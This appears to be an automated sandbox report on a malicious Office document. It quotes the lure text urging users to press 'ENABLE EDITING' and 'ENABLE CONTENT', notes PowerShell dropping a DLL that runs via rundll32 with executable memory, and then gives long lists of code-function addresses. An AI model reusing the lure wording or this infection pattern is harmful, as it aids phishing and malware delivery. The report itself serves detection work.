                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5677
                      Source: unknownProcess created: Commandline size = 5576
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5576
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Kizmwn\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00207D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002089F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F8816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FF813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FD013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00208831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F7605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FA83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F7E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FDC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F1658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00208668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FD44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FC07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00204E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00205AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F56B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00204693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F8CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FD0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002042E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F9CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002006C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FC6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F94EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F9AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FCF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00205115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00208F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00202965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00200F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00207570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F3D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00201B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00203D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FCB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00206B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FA176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002099A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00205DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F4BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001FADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002037F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F6BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002073C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002077C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00209DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002093C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F2DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0020B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F5BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00299055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00296134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00294152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00295155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00298217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00298A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002932C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00292362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00296B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002973A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00291B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002ABC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00294C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00299DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00299DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002965BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002985B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00297D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00294DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002916B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00293E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002A7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002AA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00293F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00419CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00423D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00427D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004293C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004289F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004237F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00424E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00415856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00411658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00421259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00428668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00417605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00418816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00412628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00428831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00417E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004206C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004242E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00419AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004194EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00424693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00418CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004156B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00415EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00425AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00426B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00413D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00428F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00422965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00420F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00427570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00421B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00425115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00416BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004273C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004277C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00429DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0041ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00414BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00415BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00412DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_004299A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00425DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0042EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0044303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00451E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00723856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007210E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007210BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00715155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00716134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00726934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00718217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007232F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007272F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00726AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00725AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007132C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00716B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00712362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00727BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00710BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007243BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007173A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00711B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00723C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007204E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007284D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00725CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00726D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00714DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007185B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007165BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00727DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00719DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00717D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00721ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007116B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00713E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00724689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0071577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00727F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0072D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00728F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00713F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00193C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00189055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00193856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018BC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019D099
